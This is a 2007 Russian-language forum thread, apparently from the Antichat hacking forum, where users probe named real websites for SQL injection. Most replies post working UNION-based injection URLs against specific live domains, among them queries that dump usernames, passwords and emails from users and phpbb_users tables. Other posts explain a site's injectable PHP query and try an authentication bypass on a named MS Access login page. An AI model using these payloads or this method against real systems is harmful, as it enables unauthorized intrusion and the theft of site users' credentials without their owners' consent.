ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

20.11.2007, 08:40
|
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме: 6489333
Репутация:
1564
|
|
Сообщение от NiLSoN
Имеет ли здесь место sql-инъекция?
http://www.332-332.ru/afisha/?c_id=1'
_http://www.332-332.ru/afisha/?c_id=99999+union+select+1,version(),3,4,5,6/*
А вообще, юзай статьи, их у нас великое множество)
|
|
|

20.11.2007, 10:10
|
|
Новичок
Регистрация: 11.01.2007
Сообщений: 2
Провел на форуме: 311386
Репутация:
3
|
|
To Mobile
Grand thx
|
|
|

20.11.2007, 10:20
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме: 4608122
Репутация:
874
|
|
Да место имеет 
http://www.332-332.ru/afisha/?c_id=1%20union%20select%201,version(),3,4,5,6/*
Блин поздно =/
|
|
|

20.11.2007, 10:55
|
|
Познающий
Регистрация: 27.12.2006
Сообщений: 37
Провел на форуме: 1253202
Репутация:
133
|
|
Сообщение от NiLSoN
Имеет ли здесь место sql-инъекция?
http://www.332-332.ru/afisha/?c_id=1'
Да, имеется:
http://www.332-332.ru/afisha/?c_id=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6+from+users/*
Последний раз редактировалось Mobile; 20.11.2007 в 11:06..
|
|
|

20.11.2007, 10:59
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме: 21768337
Репутация:
3486
|
|
+ forum
Код:
http://www.332-332.ru/afisha/?c_id=99999+union+select+1,count(username),3,4,5,6+from+phpbb_users
1258 Записей соответственно
Код:
http://www.332-332.ru/afisha/?c_id=99999+union+select+1,concat_ws(0x3a,username,user_password,user_email),3,4,5,6+from+phpbb_users
|
|
|

21.11.2007, 16:35
|
|
Новичок
Регистрация: 19.11.2007
Сообщений: 3
Провел на форуме: 8969
Репутация:
0
|
|
Посмотрите пожалуйста вот такую вещь. Инъекции походу нет, но код исполняемых страничек легко можно посмотреть. Может можно что-то придумать.
_http://ooomegalit.ru/forum.php?p=theme&c=999
|
|
|

21.11.2007, 17:22
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме: 1292655
Репутация:
168
|
|
Сообщение от 195531
Посмотрите пожалуйста вот такую вещь. Инъекции походу нет, но код исполняемых страничек легко можно посмотреть. Может можно что-то придумать.
_http://ooomegalit.ru/forum.php?p=theme&c=999
может, конечно, кто-то подправит, но нет там иньекции, там экранируется кавычка, если бы не экранировался то такой запрос бы тебе помог)))
http://ooomegalit.ru/forum.php?p=msg&c=3&t=3')+ordEr+bY+200--
|
|
|

21.11.2007, 17:54
|
|
Новичок
Регистрация: 19.11.2007
Сообщений: 3
Провел на форуме: 8969
Репутация:
0
|
|
я не совсем пока понимаю, что да как и хотел спросить, а где там (в каком месте кода) кавычка экранируется?
|
|
|

21.11.2007, 18:20
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме: 1292655
Репутация:
168
|
|
Сообщение от 195531
я не совсем пока понимаю, что да как и хотел спросить, а где там (в каком месте кода) кавычка экранируется?
если просмотреть исходник http://ooomegalit.ru/tpl/forum/msg.tpl, то чожно найти кусок кода
PHP код:
$sql="select * from f_thm where (id='[B]$t[/B]')"
где $t это значение которое мы передаём http://ooomegalit.ru/forum.php?p=msg&c=3& t=3
при правильном обращении мы передаём что топик под номером 3, и тогда запрос выполняется без проблем $sql="select * from f_thm where (id=' 3')"
но мы можем немного подправить и "искревить" запрос, для того что-бы вытянуть данные которые нужны нам, это можно сделать передав топик не 3, а 3')+union+select+blabla+from+blabla--
$sql="select * from f_thm where (id=' 3')+union+select+blabla+from+blabla--
====================================
если что-то не понятно, а так как из меня плохой "оратор", то советую обратится к статьям, которых тут уйма
|
|
|

21.11.2007, 18:55
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Вообщем нашёл инекцию при авторизации, в поле ввода Username, есть ли возможность обойти авторизацию или что-то сделать с базой, прочитать файлы?
База данных MS Access, это понял из следуещего запроса:
Код:
123' union select null,null from Msys.111
Microsoft JET Database Engine error '80004005'
Could not find file 'c:\windows\system32\inetsrv\Msys.mdb'.
/NextGen/login_confirm.asp, line 17
Прочитать таблицы нет прав:
Код:
123' union select null from MsysACEs
123' union select null from MsysObjects
123' union select null from MsysRelationships
Microsoft JET Database Engine error '80040e09'
Record(s) cannot be read; no read permission on 'MsysACEs'.
/NextGen/login_confirm.asp, line 17
На создать пользователя выдаёт:
Код:
123' union create user tester1 identified by '123'
Microsoft JET Database Engine error '80004005'
Pin value is not valid.
/NextGen/login_confirm.asp, line 17
Что-нибудь вообще можно поиметь с этой инъекции?
ЗЫ сам сайтег тут: _http://bandfec.com/NextGen/login_confirm.asp
Последний раз редактировалось -=lebed=-; 21.11.2007 в 18:59..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|